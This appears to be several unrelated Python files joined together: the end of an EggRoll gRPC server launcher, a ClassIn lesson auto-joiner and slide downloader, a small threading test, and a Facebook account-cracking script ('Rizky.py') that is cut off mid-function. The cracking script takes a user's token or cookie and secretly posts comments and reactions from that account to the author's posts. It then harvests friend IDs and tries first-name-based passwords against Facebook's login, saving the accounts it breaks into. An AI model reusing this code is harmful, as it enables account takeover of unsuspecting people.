command_pb2_grpc.add_CommandServiceServicer_to_server(command_servicer,
command_server)
transfer_servicer = GrpcTransferServicer()
port = args.port
transfer_port = args.transfer_port
port = command_server.add_insecure_port(f'[::]:{port}')
if transfer_port == "-1":
transfer_server = command_server
transfer_port = port
transfer_pb2_grpc.add_TransferServiceServicer_to_server(transfer_servicer,
transfer_server)
else:
transfer_server_max_workers = int(
RollPairConfKeys.EGGROLL_ROLLPAIR_EGGPAIR_DATA_SERVER_EXECUTOR_POOL_MAX_SIZE.get())
transfer_server = grpc.server(create_executor_pool(
canonical_name=executor_pool_type,
max_workers=transfer_server_max_workers,
thread_name_prefix="transfer_server"),
options=[
('grpc.max_metadata_size',
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_METADATA_SIZE.get())),
('grpc.max_send_message_length',
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
('grpc.max_receive_message_length',
int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
('grpc.keepalive_time_ms', int(CoreConfKeys.CONFKEY_CORE_GRPC_CHANNEL_KEEPALIVE_TIME_SEC.get()) * 1000),
('grpc.keepalive_timeout_ms',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_TIMEOUT_SEC.get()) * 1000),
('grpc.keepalive_permit_without_calls',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_WITHOUT_CALLS_ENABLED.get())),
('grpc.per_rpc_retry_buffer_size',
int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_RETRY_BUFFER_SIZE.get())),
('grpc.so_reuseport', False)])
transfer_port = transfer_server.add_insecure_port(f'[::]:{transfer_port}')
transfer_pb2_grpc.add_TransferServiceServicer_to_server(transfer_servicer,
transfer_server)
transfer_server.start()
pid = os.getpid()
L.info(f"starting egg_pair service, port: {port}, transfer port: {transfer_port}, pid: {pid}")
command_server.start()
cluster_manager = args.cluster_manager
myself = None
cluster_manager_client = None
if cluster_manager:
session_id = args.session_id
server_node_id = int(args.server_node_id)
static_er_conf = get_static_er_conf()
static_er_conf['server_node_id'] = server_node_id
if not session_id:
raise ValueError('session id is missing')
options = {
SessionConfKeys.CONFKEY_SESSION_ID: args.session_id
}
myself = ErProcessor(id=int(args.processor_id),
server_node_id=server_node_id,
processor_type=ProcessorTypes.EGG_PAIR,
command_endpoint=ErEndpoint(host='localhost', port=port),
transfer_endpoint=ErEndpoint(host='localhost', port=transfer_port),
pid=pid,
options=options,
status=ProcessorStatus.RUNNING)
cluster_manager_host, cluster_manager_port = cluster_manager.strip().split(':')
L.info(f'egg_pair cluster_manager: {cluster_manager}')
cluster_manager_client = ClusterManagerClient(options={
ClusterManagerConfKeys.CONFKEY_CLUSTER_MANAGER_HOST: cluster_manager_host,
ClusterManagerConfKeys.CONFKEY_CLUSTER_MANAGER_PORT: cluster_manager_port
})
cluster_manager_client.heartbeat(myself)
add_runtime_storage('er_session_id', session_id)
if platform.system() == "Windows":
t1 = threading.Thread(target=stop_processor, args=[cluster_manager_client, myself])
t1.start()
L.info(f'egg_pair started at port={port}, transfer_port={transfer_port}')
run = True
def exit_gracefully(signum, frame):
nonlocal run
run = False
L.info(
f'egg_pair {args.processor_id} at port={port}, transfer_port={transfer_port}, pid={pid} receives signum={signal.getsignal(signum)}, stopping gracefully.')
signal.signal(signal.SIGTERM, exit_gracefully)
signal.signal(signal.SIGINT, exit_gracefully)
while run:
time.sleep(1)
L.info(f'sending exit heartbeat to cm')
if cluster_manager:
myself._status = ProcessorStatus.STOPPED
cluster_manager_client.heartbeat(myself)
GrpcChannelFactory.shutdown_all_now()
# todo:1: move to RocksdbAdapter and provide a cleanup method
from eggroll.core.pair_store.rocksdb import RocksdbAdapter
RocksdbAdapter.release_db_resource()
L.info(f'closed RocksDB open dbs')
gc.collect()
L.info(f'system metric at exit: {get_system_metric(1)}')
L.info(f'egg_pair {args.processor_id} at port={port}, transfer_port={transfer_port}, pid={pid} stopped gracefully')
if __name__ == '__main__':
L.info(f'system metric at start: {get_system_metric(0.1)}')
args_parser = argparse.ArgumentParser()
args_parser.add_argument('-d', '--data-dir')
args_parser.add_argument('-cm', '--cluster-manager')
args_parser.add_argument('-nm', '--node-manager')
args_parser.add_argument('-s', '--session-id')
args_parser.add_argument('-p', '--port', default='0')
args_parser.add_argument('-t', '--transfer-port', default='0')
args_parser.add_argument('-sn', '--server-node-id')
args_parser.add_argument('-prid', '--processor-id', default='0')
args_parser.add_argument('-c', '--config')
args = args_parser.parse_args()
EGGROLL_HOME = os.environ['EGGROLL_HOME']
configs = configparser.ConfigParser()
if args.config:
conf_file = args.config
L.info(f'reading config path: {conf_file}')
else:
conf_file = f'{EGGROLL_HOME}/conf/eggroll.properties'
L.info(f'reading default config: {conf_file}')
configs.read(conf_file)
set_static_er_conf(configs['eggroll'])
if configs:
if not args.data_dir:
args.data_dir = configs['eggroll']['eggroll.data.dir']
L.info(args)
serve(args)
|
cl.py | # -*- coding: UTF-8 -*-
import configparser
import pyautogui
import cv2
import time
import winsound
import playsound
import random
import numpy
import win32gui
import win32con
import wmi
import tkinter
import multiprocessing
import os
import win32file
import struct
import requests
import re
from datetime import datetime
from multiprocessing import Process
def pptjsparser(data):
imgre = r'<img id=\".*?\" src="(.*?)"'
txtre = r'<span id.*?>(.*?)<\/span>'
return re.findall(imgre, data), re.findall(txtre, data)
class classin:
def __init__(self):
self.config = configparser.ConfigParser()
self.config.read('config.ini', encoding='utf8')
self.lessontime = self._getdaylesson()
def _getdaylesson(self):
daobj = datetime.now()
if str(daobj.weekday() + 1) in self.config['outclass']['L2'].split(','):
return self._Parsetime(self.config['outclass']['Lessiontime2'].split(",")) # 个别日期使用lesson2课表
else:
return self._Parsetime(self.config['outclass']['Lessontime'].split(","))
def _Parsetime(self, timelist):
leslist = timelist
now_time = int(time.time())
day_time = int(time.mktime(datetime.now().date().timetuple()))
leslist2 = [day_time + int(i.split(':')[0]) * 3600 + int(i.split(':')[1]) * 60 for i in leslist]
return leslist2
def Playsound(self, time=10):
'''
:param time: 播放的时间,当config中为system时无效
:param mode: 0为系统,1为自定义音频
:return:
'''
if self.config['misc']['sound'] == 'system':
winsound.Beep(random.randint(100, 10000), time * 1000)
else:
playsound.playsound(self.config['misc']['sound'])
def _Takescreenshot(self):
image = pyautogui.screenshot()
img = cv2.cvtColor(numpy.asarray(image), cv2.COLOR_RGB2BGR)
return img
def Comparepicture(self, img1, img2, threshold=0.8):
'''
:param img1: opencv image
:param img2:
:param threshold:
:return: cooperate of image
'''
img_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
res = cv2.matchTemplate(img_gray, img2, cv2.TM_CCOEFF_NORMED)
loc = numpy.where(res >= threshold)
return list(zip(*loc[::-1]))
def Autoclicklesson(self):
for i in self.lessontime:
if int(time.time()) > i - 120 and int(time.time()) < i + 160:
daobj = datetime.now()
autoconfig = self.config['outclass']['AutoEnter%s' % daobj.isoweekday()].split(',')
if autoconfig[self.lessontime.index(i)] == '1':
win32gui.ShowWindow(win32gui.FindWindow(0, 'classin'), win32con.SW_MAXIMIZE)
loc = self.Comparepicture(self._Takescreenshot(), cv2.imread("button1.png", 0))
if loc == []:
return False
pyautogui.click(loc[0][0] + 5, loc[0][1] + 5)
return True
else:
return False
return False
def Noticerforenterlesson(self):
for i in self.lessontime:
if int(time.time()) < i and i - 180 < int(time.time()):
soundthread = Process(target=self.Playsound, args=(10000,))
soundthread.start()
temp1 = pyautogui.alert(text='关闭', title='上课闹钟', button='OK')
soundthread.terminate()
return True
return False
def Safesleep(self):
Roundtime = int(self.config['inclass']['Roundtime'])
Checktime = int(self.config['inclass']['Checktime'])
while True:
camera = cv2.VideoCapture(0)
if camera.read()[0] == False:
camera.release()
cv2.destroyAllWindows()
self.Playsound(10)
os.system('cls')
time.sleep(Roundtime)
else:
camera.release()
cv2.destroyAllWindows()
time.sleep(Checktime)
def Findclassroomhandle(self):
hWndList = []
win32gui.EnumWindows(lambda hWnd, param: param.append(hWnd), hWndList) # 获取所有窗口handle
for i in hWndList:
if 'Classroom' in win32gui.GetWindowText(i):
return i
return False
def Reloadconfig(self):
self.config.read('config.ini', encoding='utf8')
self.lessontime = self._getdaylesson()
def smallclass(self):
uid = self.Findclassroomhandle()
if uid:
win32gui.ShowWindow(uid, win32con.SW_MINIMIZE)
return True
else:
return False
def Init_filewatch(self):
hDir = win32file.CreateFile(
os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache", # os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache"
0x0001,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
return hDir
def Fileobserver(self, hDir):
reqheader = {'Proxy-Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.44 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9,ja-JP;q=0.8,ja;q=0.7,en-US;q=0.6,en;q=0.5,zh-HK;q=0.4,zh-SG;q=0.3,zh-MO;q=0.2'}
okfile = []
results = win32file.ReadDirectoryChangesW(
hDir,
1024000,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
0x00000020 |
0x00000040 |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action, file in results:
okfile.append(os.path.join(os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache", file))
# okfile.append(os.path.join('C:\\temp\\'+ "cache", file))
okfile = list(set(okfile))
if okfile:
time.sleep(60) # 避免和原程序抢缓存,让原程序加载完再读取
savedir = self.config['misc']['savedir']
for i in okfile:
if '.d' not in i:
continue
if 'prepared' in i:
continue
try:
with open(i, 'rb') as f:
f.seek(12)
urllen = struct.unpack('>i', f.read(4))[0]
url = f.read(urllen).decode()
except Exception as e:
continue
filetype = url.split('.')[-1]
filename = url.split('/')[-1].split('.')[0]
if '?' in filetype:
filetype = filetype.split('?')[0]
if 'slide' in url and filetype == 'js':
pptid = url.split('/')[-6] + url.split('/')[-5] + url.split('/')[-4]
filedata = requests.get(url, headers=reqheader).text
pptdata = pptjsparser(filedata)
try:
os.mkdir(savedir + '\\' + pptid)
except:
pass
with open(os.path.join(savedir + '\\' + pptid, filename + '_dump.txt'), 'w+',
encoding='utf-8') as f:
for j in pptdata[1]:
f.write(j + '\n')
for j in pptdata[0]:
fileendurl = j.split('/')[1]
urltemp1 = url.split('/')
newurl = ''
for k in urltemp1[:-1]:
newurl += k + '/'
newurl += fileendurl
imgdata = requests.get(newurl, headers=reqheader).content
with open(os.path.join(savedir + '\\' + pptid, fileendurl), 'wb') as f:
f.write(imgdata)
elif filetype == 'pdf':
filedata = requests.get(url, headers=reqheader).content
with open(os.path.join(savedir, filename + '.pdf'), 'wb') as f:
f.write(filedata)
else:
continue
return True
else:
return False
def noticerplus(classinobject, sleeptime, return_dict):
while True:
now = classinobject.Noticerforenterlesson()
if now == True:
return_dict[0] = True
return
time.sleep(sleeptime)
def observerplus(classinobject, sleeptime):
hdir = classinobject.Init_filewatch()
while True:
classinobject.Fileobserver(hdir)
time.sleep(sleeptime)
def tkclose(a):
windowtop = tkinter.Tk()
windowtop.title("***请勿手滑关闭***")
windowtop.geometry('500x300')
windowtop.wm_attributes('-topmost', 1)
noticetext = tkinter.Label(windowtop, text="用于切换为最小化窗口,请确保程序有管理员权限", width=40, height=2)
notice2text = tkinter.Label(windowtop, text="请最小化本窗口,并在需要使用时用win+tab切换", width=40, height=2)
smallclass = tkinter.Button(windowtop, text="使classin最小化", command=a.smallclass)
noticetext.pack()
notice2text.pack()
smallclass.pack()
windowtop.mainloop()
def main():
print("Classout v1.1 start")
manager = multiprocessing.Manager()
return_dict = manager.dict()
a = classin()
hdir = a.Init_filewatch()
if a.config.getboolean('misc', 'savefile') == True:
watchThread = Process(target=observerplus, args=(a, int(a.config['outclass']['Checktime'])))
watchThread.start()
print('请正确配置完config.ini再运行本程序!')
sleepproc = Process(target=a.Safesleep, args=())
closeproc = Process(target=tkclose, args=(a,))
noticeproc = Process(target=noticerplus, args=(a, int(a.config['outclass']['Checktime']), return_dict))
outclassnoticed = 0
inclassnoticed = 0
noticenoticed = 0
return_dict[0] = 0
while True:
islesson = a.Findclassroomhandle()
if islesson:
if not inclassnoticed:
print("检测到classroom窗口,进入上课模式")
if noticeproc.is_alive():
noticeproc.terminate()
if a.config.getboolean('inclass', 'Notice'):
sleepproc = Process(target=a.Safesleep, args=())
sleepproc.start()
closeproc = Process(target=tkclose, args=(a,))
closeproc.start()
inclassnoticed = 1
outclassnoticed = 0
noticenoticed = 0
return_dict[0] = 0
if not islesson:
if not outclassnoticed:
print("检测到已退出classroom,进入下课模式")
if sleepproc.is_alive():
sleepproc.terminate()
if closeproc.is_alive():
closeproc.terminate()
outclassnoticed = 1
inclassnoticed = 0
a.Autoclicklesson()
if return_dict[0] == True:
noticenoticed = 1
if not noticenoticed and not noticeproc.is_alive() and a.config.getboolean('outclass', 'Notice'):
noticeproc = Process(target=noticerplus, args=(a, int(a.config['outclass']['Checktime']), return_dict))
noticeproc.start()
time.sleep(int(a.config['outclass']['Checktime']))
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
b = classin()
|
threadtest.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import arm.arm_controler as ac
import arm.servo_controler as sc
from core.board import Board
from arm.chess_machine import ChessMachine
import threading
from time import sleep
class Dest:
def __init__(self):
self.st = "prichan"
class overall:
def test(self):
while True:
self.dest.st = "hello"
print(self.dest.st)
sleep(1)
def tests(self):
while True:
self.dest.st = "prichan"
print(self.dest.st)
sleep(1)
def subete(self):
self.dest = Dest()
print(self.dest.st)
th = threading.Thread(target=self.test)
th.start()
while True:
self.dest.st = "prichan"
print(self.dest.st)
sleep(0.5)
if __name__ == '__main__':
overall().subete() |
Rizky.py | #!/usr/bin/python2
# coding=utf-8
'''
DECRYPT BY MAHMUD AZIM (MR. ERROR)
'''
import os,re,sys,itertools,time,requests,random,threading,json,random
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
reload(sys)
sys.setdefaultencoding('utf8')
#### LOADING ####
os.system('clear')
done = False
def animate():
for c in itertools.cycle(['\033[0;96m|', '\033[0;92m/', '\033[0;95m-', '\033[0;91m\\']):
if done:
break
sys.stdout.write('\r\033[0;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c )
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
time.sleep(5)
done = True
### KELUAR ###
def keluar():
print ("! Exit")
os.sys.exit()
### JALAN ###
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
### LOGO ###
logo = ("""\033[0;91m _____ _ ____ _ ____
| ___| |__ / ___|_ __ __ _ ___| | _____ _ _|___ \
| |_ | '_ \| | | '__/ _` |/ __| |/ / _ \ '__|__) |
\033[0;97m| _| | |_) | |___| | | (_| | (__| < __/ | / __/
|_| |_.__/ \____|_| \__,_|\___|_|\_\___|_| |_____
\033[0;93m──────────────────────────────────────────────────────
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mAuthor \033[0;91m: \033[0;96mMuhammad Rizky
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mGithub \033[0;91m: \033[0;96mGithub.com/RIZKY4/cr4ck
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mFacebook \033[0;91m: \033[0;96mFacebook.com/Rizky.Rasata""")
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
id = []
fbid = []
##### MASUK #####
def masuk():
os.system('clear')
print logo
print 52* ('\033[0;93m─');time.sleep(0.07)
print ('\033[0;92m1.\033[0;97m Login Via Token Facebook');time.sleep(0.07)
print ('\033[0;92m2.\033[0;97m Login Via Cookie Facebook');time.sleep(0.07)
print ('\033[0;92m3.\033[0;97m Ambil Token Dari Link');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Keluar');time.sleep(0.07)
print 52* ('\033[0;93m─');time.sleep(0.07)
pilih_masuk()
#### PILIH MASUK ####
def pilih_masuk():
msuk = raw_input('\033[0;92m>\033[0;97m ')
if msuk =="":
print '\033[0;91m! Isi Yg Benar'
pilih_masuk()
elif msuk =="1":
login_token()
elif msuk =="2":
login_cookie()
elif msuk =="3":
ambil_link()
elif msuk =="0":
keluar()
else:
print"\033[0;91m! Isi Yg Benar"
pilih_masuk()
#### LOGIN_TOKEN ####
def login_token():
os.system('clear')
print logo
print 50* '\033[0;93m─'
toket = raw_input("\033[0;95m•\033[0;97m Token \033[0;91m:\033[0;92m ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
print '\033[0;92m√ Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except KeyError:
print '\033[1;91m! Token salah '
time.sleep(1.7)
masuk()
except requests.exceptions.SSLError:
print '! Koneksi Bermasalah'
exit()
#### LOGIN COOKIES ####
def login_cookie():
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
try:
cookie = raw_input("\033[0;95m•\033[0;97m Cookie \033[0;91m:\033[0;92m ")
data = {
'user-agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36', # don't change this user agent.
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8',
'cookie' : cookie }
coki = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = data)
cari = re.search('(EAAA\w+)', coki.text)
hasil = cari.group(1)
zedd = open("login.txt", 'w')
zedd.write(hasil)
zedd.close()
print '\033[0;92m√ Login Berhasil'
time.sleep(2)
bot_komen()
except AttributeError:
print '\033[0;91m! Cookie Salah'
time.sleep(2)
masuk()
except UnboundLocalError:
print '\033[0;91m! Cookie Salah'
time.sleep(2)
masuk()
except requests.exceptions.SSLError:
os.system('clear')
print '\033[0;91m! Koneksi Bermasalah'
exit()
##### AMBIL LINK #####
def ambil_link():
os.system("clear")
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan("\033[0;92mDilarang Menggunakan Akun Facebook Lama...")
jalan("\033[0;92mWajib Menggunakan Akun Facebook Baru ...")
os.system ("cd ... && npm install")
jalan ("\033[0;96mMulai...")
os.system ("cd ... && npm start")
raw_input("\n[ Kembali ]")
masuk()
#### BOT KOMEN ####
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
kom = ('Gw Pake Sc Lu Bang 😘')
reac = ('ANGRY')
post = ('937777953338365')
post2 = ('938954086554085')
kom2 = ('Mantap Bang 😁')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
#### MENU ####
def menu():
os.system('clear')
try:
toket = open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid '
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\033[0;91m ! Token invalid'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
os.system("clear")
print (logo);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan ("\033[0;96m•\033[0;95m WELCOME\033[0;90m =>\033[0;92m " +nama);time.sleep(0.07)
jalan ("\033[0;96m•\033[0;95m USER ID\033[0;90m =>\033[0;92m " +id);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;95m1.\033[0;97m Crack ID Dari Teman/Publik');time.sleep(0.07)
print ('\033[0;95m2.\033[0;97m Crack ID Dari Like Teman/Publik');time.sleep(0.07)
print ('\033[0;95m3.\033[0;97m Crack ID Dari Followers');time.sleep(0.07)
print ('\033[0;95m4.\033[0;97m Cari ID Menggunakan Username');time.sleep(0.07)
print ('\033[0;95m5.\033[0;97m Lihat Hasil Crack');time.sleep(0.07)
print ('\033[0;95m6.\033[0;97m Perbarui Script');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Keluar Akun');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_menu()
### PILIH MENU ###
def pilih_menu():
peler = raw_input('\033[0;95m>\033[0;97m ')
if peler =="":
print '\033[0;91m ! Isi Yg Benar'
pilih_menu()
elif peler == "1":
crack_teman()
elif peler == "2":
crack_like()
elif peler == "3":
crack_follow()
elif peler == "4":
cari_id()
elif peler == "5":
hasil_crack()
elif peler == "6":
perbarui()
elif peler == "0":
print '\033[0;91mMenghaspus Token ...'
time.sleep(1)
os.system('rm -rf login.txt')
keluar()
else:
print '\033[0;91m ! Isi Yg Benar'
pilih_menu()
##### CRACK TEMAN/PUBLIK #####
def crack_teman():
os.system("clear")
print (logo);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;93m1.\033[0;97m Crack ID Indonesia');time.sleep(0.07)
print ('\033[0;93m2.\033[0;97m Crack ID Bangladesh');time.sleep(0.07)
print ('\033[0;93m3.\033[0;97m Crack ID Pakistan');time.sleep(0.07)
print ('\033[0;93m4.\033[0;97m Crack ID Usa');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_teman()
### PILIH TEMAN ###
def pilih_teman():
uki = raw_input('\033[0;93m>\033[0;97m ')
if uki =="":
print '\033[0;91m! Isi Yg Benar'
pilih_teman()
elif uki == "1":
crack_indo()
elif uki == "2":
crack_bangla()
elif uki == "3":
crack_pakis()
elif uki == "4":
crack_usa()
elif uki == "0":
menu()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_teman()
##### CRACK INDONESIA #####
def crack_indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;96m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;96m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;96m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_indo()
#### PILIH INDONESIA ####
def pilih_indo():
teak = raw_input('\033[0;96m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_indo()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;96mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;96m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;96mKembali \033[0;97m>")
crack_indo()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;96mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;96m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;96mKembali \033[0;97m>")
crack_indo()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_indo()
print '\033[0;91m• \033[0;96mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;96mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;96mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;96mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN INDONESIA ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pw = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw)
cek.close()
cekpoint.append(em)
else:
pw2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw2
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw2
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw2)
cek.close()
cekpoint.append(em)
else:
pw3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw3
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw3
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw3)
cek.close()
cekpoint.append(em)
else:
pw4 = 'Sayang'
